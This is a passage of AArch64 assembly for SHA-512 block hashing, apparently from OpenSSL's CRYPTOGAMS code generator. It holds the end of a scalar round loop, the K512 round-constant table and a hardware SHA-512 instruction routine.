eor x5,x5,x14,lsr#6 // sigma1(X[i+14])
add x0,x0,x9
add x27,x27,x23 // d+=h
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x0,x0,x6
add x23,x23,x17 // h+=Sigma0(a)
add x0,x0,x5
ldr x5,[sp,#16]
str x8,[sp,#8]
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
ror x7,x2,#1
and x17,x20,x27
ror x6,x15,#19
bic x28,x21,x27
ror x8,x23,#28
add x22,x22,x0 // h+=X[i]
eor x16,x16,x27,ror#18
eor x7,x7,x2,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x27,ror#41 // Sigma1(e)
eor x8,x8,x23,ror#34
add x22,x22,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x6,x6,x15,ror#61
eor x7,x7,x2,lsr#7 // sigma0(X[i+1])
add x22,x22,x16 // h+=Sigma1(e)
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x8,x23,ror#39 // Sigma0(a)
eor x6,x6,x15,lsr#6 // sigma1(X[i+14])
add x1,x1,x10
add x26,x26,x22 // d+=h
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x1,x1,x7
add x22,x22,x17 // h+=Sigma0(a)
add x1,x1,x6
ldr x6,[sp,#24]
str x9,[sp,#16]
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
ror x8,x3,#1
and x17,x27,x26
ror x7,x0,#19
bic x19,x20,x26
ror x9,x22,#28
add x21,x21,x1 // h+=X[i]
eor x16,x16,x26,ror#18
eor x8,x8,x3,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x26,ror#41 // Sigma1(e)
eor x9,x9,x22,ror#34
add x21,x21,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x7,x7,x0,ror#61
eor x8,x8,x3,lsr#7 // sigma0(X[i+1])
add x21,x21,x16 // h+=Sigma1(e)
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x9,x22,ror#39 // Sigma0(a)
eor x7,x7,x0,lsr#6 // sigma1(X[i+14])
add x2,x2,x11
add x25,x25,x21 // d+=h
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x2,x2,x8
add x21,x21,x17 // h+=Sigma0(a)
add x2,x2,x7
ldr x7,[sp,#0]
str x10,[sp,#24]
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
ror x9,x4,#1
and x17,x26,x25
ror x8,x1,#19
bic x28,x27,x25
ror x10,x21,#28
add x20,x20,x2 // h+=X[i]
eor x16,x16,x25,ror#18
eor x9,x9,x4,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x25,ror#41 // Sigma1(e)
eor x10,x10,x21,ror#34
add x20,x20,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x8,x8,x1,ror#61
eor x9,x9,x4,lsr#7 // sigma0(X[i+1])
add x20,x20,x16 // h+=Sigma1(e)
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x10,x21,ror#39 // Sigma0(a)
eor x8,x8,x1,lsr#6 // sigma1(X[i+14])
add x3,x3,x12
add x24,x24,x20 // d+=h
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x3,x3,x9
add x20,x20,x17 // h+=Sigma0(a)
add x3,x3,x8
cbnz x19,Loop_16_xx
ldp x0,x2,[x29,#96]
ldr x1,[x29,#112]
sub x30,x30,#648 // rewind
ldp x3,x4,[x0]
ldp x5,x6,[x0,#2*8]
add x1,x1,#14*8 // advance input pointer
ldp x7,x8,[x0,#4*8]
add x20,x20,x3
ldp x9,x10,[x0,#6*8]
add x21,x21,x4
add x22,x22,x5
add x23,x23,x6
stp x20,x21,[x0]
add x24,x24,x7
add x25,x25,x8
stp x22,x23,[x0,#2*8]
add x26,x26,x9
add x27,x27,x10
cmp x1,x2
stp x24,x25,[x0,#4*8]
stp x26,x27,[x0,#6*8]
b.ne Loop
ldp x19,x20,[x29,#16]
add sp,sp,#4*8
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldp x29,x30,[sp],#128
AARCH64_VALIDATE_LINK_REGISTER
ret
.section __TEXT,__const
.align 6
LK512:
.quad 0x428a2f98d728ae22,0x7137449123ef65cd
.quad 0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
.quad 0x3956c25bf348b538,0x59f111f1b605d019
.quad 0x923f82a4af194f9b,0xab1c5ed5da6d8118
.quad 0xd807aa98a3030242,0x12835b0145706fbe
.quad 0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
.quad 0x72be5d74f27b896f,0x80deb1fe3b1696b1
.quad 0x9bdc06a725c71235,0xc19bf174cf692694
.quad 0xe49b69c19ef14ad2,0xefbe4786384f25e3
.quad 0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
.quad 0x2de92c6f592b0275,0x4a7484aa6ea6e483
.quad 0x5cb0a9dcbd41fbd4,0x76f988da831153b5
.quad 0x983e5152ee66dfab,0xa831c66d2db43210
.quad 0xb00327c898fb213f,0xbf597fc7beef0ee4
.quad 0xc6e00bf33da88fc2,0xd5a79147930aa725
.quad 0x06ca6351e003826f,0x142929670a0e6e70
.quad 0x27b70a8546d22ffc,0x2e1b21385c26c926
.quad 0x4d2c6dfc5ac42aed,0x53380d139d95b3df
.quad 0x650a73548baf63de,0x766a0abb3c77b2a8
.quad 0x81c2c92e47edaee6,0x92722c851482353b
.quad 0xa2bfe8a14cf10364,0xa81a664bbc423001
.quad 0xc24b8b70d0f89791,0xc76c51a30654be30
.quad 0xd192e819d6ef5218,0xd69906245565a910
.quad 0xf40e35855771202a,0x106aa07032bbd1b8
.quad 0x19a4c116b8d2d0c8,0x1e376c085141ab53
.quad 0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
.quad 0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
.quad 0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
.quad 0x748f82ee5defb2fc,0x78a5636f43172f60
.quad 0x84c87814a1f0ab72,0x8cc702081a6439ec
.quad 0x90befffa23631e28,0xa4506cebde82bde9
.quad 0xbef9a3f7b2c67915,0xc67178f2e372532b
.quad 0xca273eceea26619c,0xd186b8c721c0c207
.quad 0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
.quad 0x06f067aa72176fba,0x0a637dc5a2c898a6
.quad 0x113f9804bef90dae,0x1b710b35131c471b
.quad 0x28db77f523047d84,0x32caab7b40c72493
.quad 0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
.quad 0x4cc5d4becb3e42b6,0x597f299cfc657e2a
.quad 0x5fcb6fab3ad6faec,0x6c44198c4a475817
.quad 0 // terminator
.byte 83,72,65,53,49,50,32,98,108,111,99,107,32,116,114,97,110,115,102,111,114,109,32,102,111,114,32,65,82,77,118,56,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 2
.align 2
.text
#ifndef __KERNEL__
.globl _sha512_block_data_order_hw
.private_extern _sha512_block_data_order_hw
.align 6
_sha512_block_data_order_hw:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ld1 {v16.16b,v17.16b,v18.16b,v19.16b},[x1],#64 // load input
ld1 {v20.16b,v21.16b,v22.16b,v23.16b},[x1],#64
ld1 {v0.2d,v1.2d,v2.2d,v3.2d},[x0] // load context
adrp x3,LK512@PAGE
add x3,x3,LK512@PAGEOFF
rev64 v16.16b,v16.16b
rev64 v17.16b,v17.16b
rev64 v18.16b,v18.16b
rev64 v19.16b,v19.16b
rev64 v20.16b,v20.16b
rev64 v21.16b,v21.16b
rev64 v22.16b,v22.16b
rev64 v23.16b,v23.16b
b Loop_hw
.align 4
Loop_hw:
ld1 {v24.2d},[x3],#16
subs x2,x2,#1
sub x4,x1,#128
orr v26.16b,v0.16b,v0.16b // offload
orr v27.16b,v1.16b,v1.16b
orr v28.16b,v2.16b,v2.16b
orr v29.16b,v3.16b,v3.16b
csel x1,x1,x4,ne // conditional rewind
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v16.2d
ld1 {v16.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
rev64 v16.16b,v16.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
ld1 {v24.2d},[x3],#16
add v25.2d,v25.2d,v17.2d
ld1 {v17.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
